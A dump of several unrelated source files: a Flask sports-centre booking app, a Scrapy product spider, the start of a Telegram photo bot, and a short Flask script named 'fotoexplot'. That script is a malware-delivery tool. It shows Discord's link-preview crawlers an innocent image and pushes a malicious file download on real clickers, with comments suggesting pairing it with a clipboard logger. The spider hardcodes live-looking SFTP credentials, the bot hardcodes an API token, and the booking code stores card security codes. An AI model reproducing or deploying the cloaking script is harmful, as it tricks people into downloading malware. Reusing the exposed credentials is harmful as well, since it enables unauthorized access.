act.activity_price\n\n if end_time - start_time != 1:\n flash('You can only book a 1-hour session')\n return redirect(url_for('.book_facility', type=type))\n\n timetables = TimeManagement.query.filter_by(date=date).all()\n for timetable in timetables:\n if start_time == timetable.start_time:\n id = timetable.id\n\n timetable = TimeManagement.query.get(id)\n\n if number + timetable.current_capacity > fac.capacity:\n flash('You have too many people!')\n return redirect(url_for('.book_facility', type=type))\n\n else:\n act.weekly_income = act.weekly_income + price\n act.weekly_usage = act.weekly_usage + number\n db.session.add(act)\n db.session.commit()\n\n booking = Booking(number=number,\n time_id=timetable.id,\n activity=activity,\n status=\"Unpaid\",\n payment=payment,\n fees=price)\n db.session.add(booking)\n db.session.commit()\n\n account = Account.query.filter_by(user_id=current_user.id).first()\n book = Booking.query.order_by(Booking.timestamp.desc()).filter_by(account_id=account.id).first_or_404()\n\n timetable.current_capacity = number + timetable.current_capacity\n db.session.add(timetable)\n db.session.commit()\n\n if payment == \"Credit Card\":\n flash('Pay for your booking.')\n return redirect(url_for('.handle_card_booking', book_id=book.id))\n elif payment == \"Cash\":\n flash('You will pay for your booking by cash.')\n return redirect(url_for('.index'))\n\n return render_template('book.html', form=form)\n\n\n'''\n@main.route('/book_season', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef book_regular():\n form = RegularBookForm()\n if form.validate_on_submit():\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n'''\n\n\n@main.route('/handle_card_booking/<int:book_id>', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.HANDLE)\ndef handle_card_booking(book_id):\n account = Account.query.filter_by(user_id=current_user.id).first()\n card = CreditCardInfo.query.filter_by(account_id=account.id).first()\n book = Booking.query.filter_by(id=book_id).first()\n form = CardForm()\n\n if form.validate_on_submit():\n card_info = CreditCardInfo(card_number=form.card_number.data,\n expire_month=form.expire_month.data,\n expire_year=form.expire_year.data,\n security_code=form.security_code.data,\n holder_name=form.holder_name.data,\n account_id=account.id\n )\n if card is not None:\n form.card_number.data = card.card_number\n form.expire_month.data = card.expire_month\n form.expire_year.data = card.expire_year\n form.security_code.data = card.security_code\n form.holder_name.data = card.holder_name\n db.session.add(card_info)\n db.session.commit()\n book.status = \"Paid\"\n db.session.add(book)\n db.session.commit()\n\n # format() stringifies the date/time fields so concatenation cannot fail on non-str types\n receipt = '{}\\n{}\\n{}~{}\\n'.format(book.activity, book.time.date, book.time.start_time, book.time.end_time)\n pdf_name = str(book.id) + '.pdf'\n pdfkit.from_string(receipt, pdf_name)\n\n qr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n )\n\n qr.add_data(receipt)\n qr.make(fit=True)\n\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\n\n send_email(current_user.email, 'Your booking receipt',\n 'booking_receipt', book=book, img=img)\n flash('A booking receipt has been sent to you by email.')\n return render_template('handle_card_booking.html', book=book, 
form=form)\n\n\n@main.route('/bookings/<int:id>/cancel', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CANCEL)\ndef cancel_booking(id):\n booking = Booking.query.get_or_404(id)\n form = SelectPaymentForm(cards=current_user.cards)\n if form.validate_on_submit():\n db.session.delete(booking)\n db.session.commit()\n return redirect(url_for('.display_user_bookings'))\n return render_template('cancel_booking.html', form=form, booking=booking)\n\n\n@main.route('/pay_membership/<int:type_id>', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef pay_membership(type_id):\n membership_type = MembershipType.query.get_or_404(type_id)\n account = Account.query.filter_by(user_id=current_user.id).first()\n form = PurchaseMembershipForm()\n if form.validate_on_submit():\n membership = Membership(title=form.title.data,\n status=\"Unpaid\",\n firstname=form.firstname.data,\n lastname=form.lastname.data,\n payment=form.payment.data,\n account_id=account.id,\n membership_type_id=membership_type.id\n )\n db.session.add(membership)\n db.session.commit()\n\n # assumes length is in months: 1 -> 30 days, 3 -> 90 days, otherwise a year\n if (membership_type.length == 1):\n length = 30\n elif (membership_type.length == 3):\n length = 90\n else:\n length = 365\n membership.valueOfEnd_date(length)\n db.session.commit()\n\n flash('Thanks! You have become one of our members!')\n return redirect(url_for('.handle_card_membership', id=account.id))\n return render_template('pay_membership.html', form=form, membership_type=membership_type)\n\n\n@main.route('/handle_card_membership/<int:id>', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.HANDLE)\ndef handle_card_membership(id):\n membership = Membership.query.filter_by(account_id=id).first()\n card = CreditCardInfo.query.filter_by(account_id=id).first()\n form = CardForm()\n membership_type = MembershipType.query.filter_by(id=membership.membership_type_id).first()\n price = membership_type.price\n if form.validate_on_submit():\n card_info = CreditCardInfo(card_number=form.card_number.data,\n expire_month=form.expire_month.data,\n expire_year=form.expire_year.data,\n security_code=form.security_code.data,\n holder_name=form.holder_name.data,\n account_id=id\n )\n if card is not None:\n form.card_number.data = card.card_number\n form.expire_month.data = card.expire_month\n form.expire_year.data = card.expire_year\n form.security_code.data = card.security_code\n form.holder_name.data = card.holder_name\n db.session.add(card_info)\n db.session.commit()\n membership.status = \"Paid\"\n db.session.add(membership)\n db.session.commit()\n send_email(current_user.email, 'Your booking receipt',\n 'booking_receipt', membership=membership)\n flash('A booking receipt has been sent to you by email.')\n return render_template('handle_card_membership.html', price=price, form=form)\n\n\n@main.route('/configure_facility', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_facility():\n form = ConfigureFacilityForm()\n if form.validate_on_submit():\n operation = form.operation.data\n capacity = form.capacity.data\n name = form.name.data\n url = form.url.data\n description = form.description.data\n\n if operation == \"add\":\n facility = Facility(name=name,\n url=url,\n capacity=capacity,\n description=description)\n db.session.add(facility)\n db.session.commit()\n flash('You have added the facility')\n\n elif operation == \"edit\":\n fac = Facility.query.filter_by(name=name).first()\n fac.capacity = capacity\n fac.url = url\n fac.description = 
description\n\n db.session.add(fac)\n db.session.commit()\n flash('You have edited the facility')\n\n elif operation == \"delete\":\n fac = Facility.query.filter_by(name=name).first()\n db.session.delete(fac)\n db.session.commit()\n flash('You have deleted the facility')\n\n return render_template('configure_facility.html', form=form)\n\n\n@main.route('/configure_activity', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_activity():\n form = ConfigureActivityForm()\n if form.validate_on_submit():\n operation = form.operation.data\n facility = form.facility.data\n activity = form.activity.data\n price = form.price.data\n\n fac = Facility.query.filter_by(name=facility).first()\n if operation == \"add\":\n act = Activity(weekly_income=0,\n weekly_usage=0,\n activity_price=price,\n activity_name=activity,\n facility_id=fac.id\n )\n db.session.add(act)\n db.session.commit()\n flash('You have added the activity')\n\n elif operation == \"edit\":\n act = Activity.query.filter_by(activity_name=activity).first()\n act.activity_price = price\n act.activity_name = activity\n act.facility_id = fac.id\n\n db.session.add(act)\n db.session.commit()\n flash('You have edited the activity')\n\n elif operation == \"delete\":\n act = Activity.query.filter_by(activity_name=activity).first()\n db.session.delete(act)\n db.session.commit()\n flash('You have deleted the activity')\n\n return render_template('configure_activity.html', form=form)\n\n\n@main.route('/configure_timetable', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CONFIGURE)\ndef configure_timetable():\n form = ConfigureTimetableForm()\n if form.validate_on_submit():\n date = form.date.data\n start_time = form.start_time.data\n end_time = form.end_time.data\n facility = form.facility.data\n\n fac = Facility.query.filter_by(name=facility).first()\n\n for i in range(start_time, end_time):\n timetable = TimeManagement(date=date,\n start_time=i,\n end_time=i + 1,\n facility_id=fac.id)\n db.session.add(timetable)\n db.session.commit()\n\n return render_template('configure_timetable.html', form=form)\n\n\n@main.route('/facilities')\ndef display_facilities():\n facilities = Facility.query.all()\n template = 'admin/facilities.html' if current_user.is_administrator() else 'facilities.html'\n return render_template(template, facilities=facilities)\n\n\n@main.route('/membership-types')\ndef display_membership_types():\n memberships = MembershipType.query.all()\n template = 'admin/membership_types.html' if current_user.is_administrator() else 'membership.html'\n return render_template(template, membership_types=memberships)\n\n\n@main.route('/membership-types/<int:type>/purchase', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.PAY)\ndef purchase_membership(type):\n membership_type = MembershipType.query.get_or_404(type)\n form = SelectPaymentForm(cards=current_user.cards)\n\n if form.validate_on_submit():\n membership = Membership(membership_type_id=type, user_id=current_user.id)\n db.session.add(membership)\n\n if form.payment_card.data == SelectPaymentForm.NEW_CARD_CHOICE[0]:\n card_form = form.new_payment_card\n new_card = CreditCardInfo(\n holder_name=card_form.cardholder_name.data,\n card_number=card_form.card_number.data,\n expire_month=card_form.expiry_date.expiry_month.data,\n expire_year=card_form.expiry_date.expiry_year.data,\n security_code=card_form.security_code.data,\n user_id=current_user.id\n )\n db.session.add(new_card)\n flash('Card successfully added to your account.')\n\n 
db.session.commit()\n flash('Thanks! You have successfully purchased a {} membership.'.format(membership_type.name))\n return redirect(url_for('main.index'))\n\n return render_template('pay_membership.html', membership_type=membership_type, form=form)\n\n\n@main.route('/my/bookings')\n@login_required\ndef display_user_bookings():\n return render_template('my_booking.html', bookings=current_user.bookings)\n\n\n@main.route('/my_card/<int:id>')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_cards(id):\n user = User.query.filter_by(id=id).first()\n cards = CreditCardInfo.query.filter_by(user_id=user.id).all()\n return render_template('my_card.html', cards=cards)\n\n\n@main.route('/my/membership')\n@login_required\n@permission_required(Permission.DISPLAY)\ndef display_membership():\n membership = Membership.query.filter_by(user_id=current_user.id).first()\n membership_type = MembershipType.query.filter_by(id=membership.membership_type_id).first() if membership else None\n return render_template('my_membership.html', membership=membership, membership_type=membership_type)\n\n\n@main.route('/timetable')\ndef timetable_all():\n # assumes an ISO-formatted ?date=YYYY-MM-DD query parameter when one is given\n date = request.args.get('date', default=datetime.today(), type=dt.datetime.fromisoformat)\n # add a timedelta instead of day + 1 so month and year boundaries are handled correctly\n end_of_day = datetime(\n year=date.year,\n month=date.month,\n day=date.day,\n hour=0,\n minute=0,\n second=0\n ) + dt.timedelta(days=1)\n activity_instances = ActivityInstance.query \\\n .filter(ActivityInstance.start_time >= date, ActivityInstance.end_time < end_of_day) \\\n .order_by(ActivityInstance.start_time) \\\n .all()\n\n activity_instances_by_facility = {facility.name: [] for facility in Facility.query.all()}\n for instance in activity_instances:\n activity_instances_by_facility[instance.activity.facility.name].append(instance)\n\n return render_template('timetable_all.html', activity_instances=activity_instances_by_facility)\n\n\n@main.route('/facilities/<int:id>/timetable')\ndef timetable_facility(id):\n facility = Facility.query.get_or_404(id)\n activity_instances = reduce(list.__add__, [activity.instances.order_by(ActivityInstance.start_time).all() for activity in facility.activities.all()])\n return render_template('timetable_all.html', activity_instances={facility.name: activity_instances})\n\n\n# @main.route('/timetable_facility/<int:type>')\n# def timetable_facility(type):\n# if type == 1:\n# facility = \"Swimming pool\"\n# elif type == 2:\n# facility = \"Fitness room\"\n# elif type == 3:\n# facility = \"Squash courts\"\n# else:\n# facility = \"Sports hall\"\n#\n# facility = Facility.query.filter_by(name=facility).all()\n# today = dt.date.today()\n# day2 = today + dt.timedelta(days=1)\n# day3 = today + dt.timedelta(days=2)\n# day4 = today + dt.timedelta(days=3)\n# day5 = today + dt.timedelta(days=4)\n# timetable1 = TimeManagement.query.filter_by(start_time=today).all()\n# timetable2 = TimeManagement.query.filter_by(start_time=day2).all()\n# timetable3 = TimeManagement.query.filter_by(start_time=day3).all()\n# timetable4 = TimeManagement.query.filter_by(start_time=day4).all()\n# timetable5 = TimeManagement.query.filter_by(start_time=day5).all()\n# return render_template('timetable_facility.html', type=type + 1, today=today, day3=day3, day2=day2, day4=day4,\n# day5=day5, facility=facility, timetable1=timetable1, timetable2=timetable2,\n# timetable3=timetable3, timetable4=timetable4, timetable5=timetable5)\n\n\n@main.route('/my/membership/cancel', methods=['GET', 'POST'])\n@login_required\ndef cancel_membership():\n membership = current_user.membership\n if membership is None:\n return 
redirect(url_for('main.display_membership'))\n timedelta = membership.get_end_date() - dt.datetime.now()\n days_left = timedelta.days\n money_refund = 0.9 * (days_left / membership.membership_type.length) * membership.membership_type.price\n form = SelectPaymentForm(cards=current_user.cards)\n if form.validate_on_submit():\n db.session.delete(membership)\n db.session.commit()\n flash('You have cancelled your membership!')\n return redirect(url_for('main.display_membership'))\n return render_template('cancel_membership.html', money_refund=money_refund, days_left=days_left,\n membership=membership, form=form)\n\n\n@main.route('/user/<username>')\ndef user(username):\n user = User.query.filter_by(username=username).first_or_404()\n return render_template('user.html', user=user)\n\n\n@main.route('/search_booking', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CANCEL)\ndef search_booking():\n form = SearchForm()\n if form.validate_on_submit():\n email = form.email.data\n\n user = User.query.filter_by(email=email).first()\n return redirect(url_for('.display_bookings', id=user.id))\n return render_template('search_booking.html', form=form)\n\n\n@main.route('/search_membership', methods=['GET', 'POST'])\n@login_required\n@permission_required(Permission.CANCEL)\ndef search_membership():\n form = SearchForm()\n if form.validate_on_submit():\n email = form.email.data\n\n user = User.query.filter_by(email=email).first()\n return redirect(url_for('.display_membership', id=user.id))\n return render_template('search_membership.html', form=form)\n\n\n@main.route('/view_income')\n@login_required\n@permission_required(Permission.VIEW_BUSINESS)\ndef view_income():\n \"\"\"income_facility1 = 0\n income_facility2 = 0\n income_facility3 = 0\n income_facility4 = 0\n\n today = datetime.date.today()\n day1 = today - datetime.timedelta(days=1)\n day2 = today - datetime.timedelta(days=2)\n day3 = today - datetime.timedelta(days=3)\n day4 = today - datetime.timedelta(days=4)\n day5 = today - datetime.timedelta(days=5)\n day6 = today - datetime.timedelta(days=6)\n\n timetable1 = Time_management.query.filter_by(date=today).all()\n timetable2 = Time_management.query.filter_by(date=day1).all()\n timetable3 = Time_management.query.filter_by(date=day2).all()\n timetable4 = Time_management.query.filter_by(date=day3).all()\n timetable5 = Time_management.query.filter_by(date=day4).all()\n timetable6 = Time_management.query.filter_by(date=day5).all()\n timetable7 = Time_management.query.filter_by(date=day6).all()\n\n for timetable in timetable1:\n if timetable.facility == 1:\n booking = Booking.query.filter_by(id=timetable.booking_id).get()\n income_facility1 += booking.fees\n\"\"\"\n overall_income = 0\n overall_usage = 0\n activities = Activity.query.all()\n for activity in activities:\n overall_income += activity.weekly_income\n overall_usage += activity.weekly_usage\n return render_template('business.html', overall_income=overall_income,\n overall_usage=overall_usage, activities=activities)\n\n\n@main.route('/users')\n@admin_required\ndef display_users():\n return render_template('admin/users.html', users=User.query.all())\n\n\n@main.route('/users/new', methods=['GET', 'POST'])\n@admin_required\ndef add_user():\n form = EditUserForm()\n if form.validate_on_submit():\n user = User(email=form.email.data.lower(),\n username=form.username.data,\n password=form.password.data,\n role_id=form.role.data.id)\n db.session.add(user)\n db.session.commit()\n flash('User successfully added to database.')\n return redirect(url_for('.display_users'))\n return 
render_template('admin/edit_user.html', form=form)\n\n\n@main.route('/activity-instances')\n@admin_required\ndef display_activity_instances():\n return render_template('admin/activity_instances.html', activity_instances=ActivityInstance.query.all())\n\n\n@main.route('/activity-instances/new', methods=['GET', 'POST'])\n@admin_required\ndef add_activity_instance():\n form = EditActivityInstanceForm()\n if form.validate_on_submit():\n instance = ActivityInstance(\n start_time=form.start_time.data,\n end_time=form.end_time.data,\n activity_id=form.activity_id.data,\n court_id=form.court_id.data\n )\n db.session.add(instance)\n db.session.commit()\n flash('Activity instance successfully added to database.')\n return redirect(url_for('.display_activity_instances'))\n return render_template('admin/edit_activity_instance.html', form=form)\n\n\n@main.route('/memberships')\n@admin_required\ndef display_memberships():\n return render_template('admin/memberships.html', memberships=Membership.query.all())\n\n\n@main.route('/memberships/new', methods=['GET', 'POST'])\n@admin_required\ndef add_membership():\n form = EditMembershipForm()\n if form.validate_on_submit():\n membership = Membership(\n membership_type_id=form.membership_type_id.data,\n user_id=form.user_id.data\n )\n db.session.add(membership)\n db.session.commit()\n flash('Membership successfully added to database.')\n return redirect(url_for('.display_memberships'))\n return render_template('admin/edit_membership.html', form=form)\n\n\n@main.route('/activities')\n@admin_required\ndef display_activities():\n return render_template('admin/activities.html', activities=Activity.query.all())\n\n\n@main.route('/bookings')\n@admin_required\ndef display_bookings():\n return render_template('admin/bookings.html', bookings=Booking.query.all())\n\n\n@main.route('/edit-profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.name = form.name.data\n current_user.location = form.location.data\n current_user.about_me = form.about_me.data\n db.session.add(current_user._get_current_object())\n db.session.commit()\n flash('Your profile has been updated.')\n return redirect(url_for('.user', username=current_user.username))\n form.name.data = current_user.name\n form.location.data = current_user.location\n form.about_me.data = current_user.about_me\n return render_template('edit_profile.html', form=form)\n\n\n@main.route('/edit-profile/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_profile_admin(id):\n user = User.query.get_or_404(id)\n form = EditProfileAdminForm(user=user)\n if form.validate_on_submit():\n user.email = form.email.data\n user.username = form.username.data\n user.confirmed = form.confirmed.data\n user.role = Role.query.get(form.role.data)\n user.name = form.name.data\n user.location = form.location.data\n user.about_me = form.about_me.data\n db.session.add(user)\n db.session.commit()\n flash('The profile has been updated.')\n return redirect(url_for('.user', username=user.username))\n form.email.data = user.email\n form.username.data = user.username\n form.confirmed.data = user.confirmed\n form.role.data = user.role_id\n form.name.data = user.name\n form.location.data = user.location\n form.about_me.data = user.about_me\n return render_template('edit_profile.html', form=form, user=user)\n\n\n@main.route('/facilities/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_facility():\n form = EditFacilityForm()\n 
if form.validate_on_submit():\n facility = Facility(name=form.name.data,\n capacity=form.capacity.data,\n description=form.description.data)\n db.session.add(facility)\n db.session.commit()\n flash('Facility has been added to Database')\n return redirect(url_for('.display_facilities'))\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n@main.route('/activities/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_activity():\n form = EditActivityForm()\n if form.validate_on_submit():\n activity = Activity(activity_staff_id=form.activity_staff_id.data,\n activity_price=form.activity_price.data,\n activity_name=form.activity_name.data,\n facility_id=form.facility_id.data)\n db.session.add(activity)\n db.session.commit()\n flash('Activity has been added to Database')\n return redirect(url_for('.display_activities'))\n\n return render_template('admin/edit_activity.html', form=form)\n\n\n@main.route('/membership-types/new', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef add_membership_type():\n form = EditMembershipTypeForm()\n if form.validate_on_submit():\n membership_type = MembershipType(name=form.name.data, length=form.length.data, price=form.price.data)\n db.session.add(membership_type)\n db.session.commit()\n flash('Membership type has been added to database')\n return redirect(url_for('.display_membership_types'))\n return render_template('admin/edit_membership_type.html', form=form)\n\n\n@main.route('/membership-types/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_membership_type(id):\n mtype = MembershipType.query.get_or_404(id)\n form = EditMembershipTypeForm()\n\n if form.validate_on_submit():\n mtype.name = form.name.data\n mtype.length = form.length.data\n mtype.price = form.price.data\n\n db.session.commit()\n flash('Membership type successfully updated!')\n return redirect('/')\n\n form.name.data = mtype.name\n form.length.data = mtype.length\n form.price.data = mtype.price\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n# TODO: need some kind of display function for each facility to reach id before calling this method\n@main.route('/facilities/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_facility(id):\n facility = Facility.query.get_or_404(id)\n form = EditFacilityForm()\n\n if form.validate_on_submit():\n facility.name = form.name.data\n facility.capacity = form.capacity.data\n facility.description = form.description.data\n\n db.session.commit()\n flash('Facility successfully updated!')\n return redirect('/')\n\n form.name.data = facility.name\n form.capacity.data = facility.capacity\n form.description.data = facility.description\n\n return render_template('admin/edit_facility.html', form=form)\n\n\n# TODO: need some kind of display function for each activity to reach id before calling this method\n@main.route('/activities/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_activity(id):\n activity = Activity.query.get_or_404(id)\n form = EditActivityForm()\n\n if form.validate_on_submit():\n activity.activity_name = form.activity_name.data\n activity.activity_staff_id = form.activity_staff_id.data\n activity.activity_price = form.activity_price.data\n activity.facility_id = form.facility_id.data\n\n db.session.commit()\n flash('Activity successfully updated!')\n return redirect(url_for('.display_activities'))\n\n form.activity_name.data = activity.activity_name\n form.activity_staff_id.data = activity.activity_staff_id\n 
form.activity_price.data = activity.activity_price\n form.facility_id.data = activity.facility_id\n\n return render_template('admin/edit_activity.html', form=form)\n\n\n# Display method to display the list of activities to get to the edit function\n@main.route('/activities/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef display_activity(id):\n activities = db.session.query(Activity).all()\n\n if not activities:\n flash('No results found!')\n return redirect('/')\n else:\n table = ActivityTable(activities)\n table.border = True\n return render_template('admin/display_activity.html', table=table)\n\n\n@main.route('/facilities/<int:id>', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef display_facility(id):\n facilities = db.session.query(Facility).all()\n\n if not facilities:\n flash('No results found!')\n return redirect('/')\n else:\n table = FacilityTable(facilities)\n table.border = True\n return render_template('admin/display_facility.html', table=table)\n","repo_name":"HollowMan6/Answers-for-My-Leeds-COMP2-Courses","sub_path":"COMP2913/Master/app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":33202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25062752113","text":"import requests, io\nfrom flask import Flask, request, send_file\napp = Flask(\n__name__,\n template_folder='templates',\n static_folder='static'\n)\n@app.route('/', methods=['GET'])\ndef main():\n Image = 'https://e7.pngegg.com/pngimages/193/384/png-clipart-panda-panda.png' # Replace this with your image link\n Malicious = 'MaliciousFIleDownloadLink'# Replace this with your download link\n Redirect = \"RedirectLink\" # You can just put the image here or you can put a custom site. You can combine this with my clipboard logger and it'll be more op lol https://github.com/TheonlyIcebear/Clipboard-Javascript-Logger\n # This is to get the ip\n if request.environ.get('HTTP_X_FORWARDED_FOR') is None:\n ip = request.environ['REMOTE_ADDR']\n else:\n ip = request.environ['HTTP_X_FORWARDED_FOR']\n print(ip)\n if ip.startswith('35.') or ip.startswith('34.'):\n # If discord is getting a link preview send a image\n return send_file(\n io.BytesIO(requests.get(Image).content),\n mimetype='image/jpeg',\n download_name='AnyName.png')\n else:\n # If a real person is clicking the link send a malicious file and redirect back to the image\n return f''' \n '''+'''\n ''' # If the file doesn't download change the 500 to a higher number like 1000\nif __name__ == '__main__':\n # Run the Flask app\n app.run(\n host='0.0.0.0',\n debug=True,\n port=8080\n )\n","repo_name":"MematiBaskann/fotoexplot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20538059317","text":"\"\"\"\nOriginal ticket: https://www.assembla.com/spaces/competitormonitor/tickets/3926-express-gifts---spider-copy---dunelm#/activity/ticket:\nThis spider was copied from the Lakeland account\nThis spider downloads the csv file and extracts the products from the URLs.\nThe identifier/SKU is set from the CSV file.\n\"\"\"\nimport csv\nimport json\nimport re\nfrom tempfile import NamedTemporaryFile\nimport os\n\nimport paramiko\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse, FormRequest\nfrom scrapy.utils.response import get_base_url\nfrom urlparse import urljoin\n\nfrom product_spiders.items import Product, ProductLoaderWithoutSpaces as ProductLoader\nfrom product_spiders.config import CLIENTS_SFTP_HOST, CLIENTS_SFTP_PORT\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nclass DunelmSpider(BaseSpider):\n name = 'expressgifts-dunelm.com'\n allowed_domains = ['dunelm.com']\n start_urls = ['http://www.dunelm.com']\n\n def parse(self, response):\n transport = paramiko.Transport((CLIENTS_SFTP_HOST, CLIENTS_SFTP_PORT))\n username = \"expressgifts\"\n password = \"jqh3aMrK\"\n transport.connect(username = username, password = password)\n sftp = paramiko.SFTPClient.from_transport(transport)\n files = sftp.listdir_attr()\n \n f = NamedTemporaryFile(delete=True, suffix='.csv', prefix='expressgifts_dunelm_')\n sftp.get('express_gifts_flat_file.csv', f.name)\n\n with open(f.name) as csv_f:\n rows = csv.DictReader(csv_f)\n for row in rows:\n if row.get('DUNELM').strip():\n yield Request(row['DUNELM'].strip(), callback=self.parse_product,\n meta={'sku': row['PRODUCT_NUMBER']})\n\n f.close()\n \n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n \n loader = ProductLoader(selector=hxs, item=Product())\n loader.add_value('url', response.url)\n loader.add_xpath('brand', './/dt[text()=\"Brand\"]/following-sibling::dd[1]/text()')\n categories = hxs.select('.//div[contains(@class, \"breadcrumbs\")]//a/text()').extract()\n for category in categories:\n if 'search' in category.lower():\n continue\n loader.add_value('category', category)\n loader.add_value('sku', response.meta.get('sku', ''))\n loader.add_xpath('name', './/h1[@itemprop=\"name\"]//text()')\n \n if hxs.select('//article[@id=\"product\"]'):\n image_url = hxs.select('.//div[@id=\"amplienceContent\"]//img/@src').extract()\n loader.replace_value('image_url', urljoin(base_url, image_url[0]))\n options = hxs.select('//script[@type=\"text/javascript\"]/text()[contains(., \"productData\")]').extract()\n for item in self.parse_options(hxs, base_url, loader, options):\n yield item\n \n for product in hxs.select('//article[@class=\"bdp-item\"]'):\n image_url = product.select('.//a[contains(@id, \"mainImage\")]/img/@src').extract()[0]\n loader.replace_value('image_url', urljoin(base_url, image_url))\n options = product.select('./div/div[1]//script[@type=\"text/javascript\"]/text()').extract()\n for item in self.parse_options(product, base_url, loader, options):\n yield item\n \n def parse_one_product(self, hxs, base_url, loader):\n if options:\n self.log('Options detected on %s' %loader.get_collected_values('url'))\n image_url = hxs.select('.//div[@id=\"amplienceContent\"]//img/@src').extract()\n loader.add_value('image_url', urljoin(base_url, image_url[0]))\n loader.add_xpath('name', './/h1[@itemprop=\"name\"]//text()')\n \n loader.add_xpath('identifier', 
'.//article[@id=\"product\"]/@data-product-id')\n loader.add_xpath('sku', './/article[@id=\"product\"]/@data-product-id')\n \n if not hxs.select('.//div[contains(@id, \"stock\")]//text()[contains(.,\"in-stock\")]') and hxs.select('//span[contains(@id, \"standardIcon\")]/@class[.=\"icon availability unavailable\"]'):\n loader.add_value('stock', 0)\n loader.add_xpath('price', './/strong[@id=\"fromPrice\"]/text()')\n product = loader.load_item()\n if product['price'] < 49:\n product['shipping_cost'] = 3.49\n return product\n\n def parse_options(self, hxs, base_url, loader, options):\n regx = re.compile('productData(?!.*productData).*? = ({.+})', re.S)\n options = options[0]\n options = json.loads(re.findall(regx, options)[0])\n # name = loader.get_output_value('name')\n for variant in options['skus']:\n loader.replace_value('identifier', variant['id'])\n # loader.replace_value('sku', variant['id'])\n loader.replace_value('price', variant['price'])\n loader.replace_value('name', variant['name'].replace('"', '\"'))\n # option_name = ''\n for attribute in variant['attributes']:\n # option_name += u'{} '.format(attribute['value'])\n if attribute['name'] == 'Colour':\n colour = attribute['value']\n try:\n loader.replace_value('image_url', urljoin(base_url, options['colour'][colour]))\n except:\n pass\n # option_name = option_name.strip()\n product = Product(loader.load_item())\n # product['name'] += u' {}'.format(option_name)\n if product['price'] < 49:\n product['shipping_cost'] = 3.49\n formdata = {'dataType':'json', 'quantity':'1', 'storeId':'10151',\n 'productId':variant['identifier'], 'sku':variant['id']}\n #self.log('Url %s. Formdata %s' %(base_url, formdata))\n yield FormRequest('http://www.dunelm.com/webapp/wcs/stores/servlet/AjaxProductAvailabilityView',\n formdata=formdata,\n meta={'product':product, 'tries':1}, callback=self.parse_stock)\n\n def parse_stock(self, response):\n tries = response.meta['tries']\n try:\n stock = json.loads(response.body)\n self.log('Success with %d tries' %tries)\n except:\n tries+=1\n if tries > 50:\n self.log('Gave up retrying stock status for %s' %response.request.headers['Referer'])\n yield response.meta['product']\n return\n self.log('Trying %d get stock status' %tries)\n yield response.request.replace(dont_filter=True, \n meta={'product':response.meta['product'], 'tries':tries})\n return\n deliveries = ('expressAvailableClass', 'rocsAvailableClass', 'standardAvailableClass')\n product = response.meta['product']\n product['stock'] = 0\n for delivery in deliveries:\n if stock[delivery] == \"available\":\n del product['stock']\n break\n\n yield product\n ","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/express_gifts/dunelm.py","file_name":"dunelm.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20339028729","text":"import telebot\nfrom telebot import types\nfrom PIL import Image\nfrom PIL import ImageFilter\nfrom PIL import ImageOps\nimport os\nimport time\n\n\nbot = telebot.TeleBot('6974578088:AAE-qBT6FVPesqpH6WcDTa61TJaXwTyyO_o')\nproject_folder = \"/Users/Fedor/PycharmProjects/2kurs\"\n\nglobal ind\nind = 0\n\n\ndef delete_jpg_files(folder_path):\n try:\n files = os.listdir(folder_path)\n\n jpg_files = [file for file in files if file.endswith(\".jpg\")]\n\n for jpg_file in jpg_files:\n file_path = os.path.join(folder_path, jpg_file)\n os.remove(file_path)\n print(f\"Удален файл: {file_path}\")\n\n except Exception as e:\n print(f\"Произошла ошибка при удалении файлов: {e}\")\n\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn1 = types.KeyboardButton(text='/start')\n btn2 = types.KeyboardButton(text='/help')\n keyboard.add(btn1, btn2)\n bot.send_message(message.chat.id, text='выберите функцию', reply_markup=keyboard)\n\n\n\n@bot.message_handler(commands=['help'])\ndef help(message):\n k_b = types.ReplyKeyboardMarkup(resize_keyboard=True)\n btn3 = types.KeyboardButton(text='/reverse_photo')\n btn4 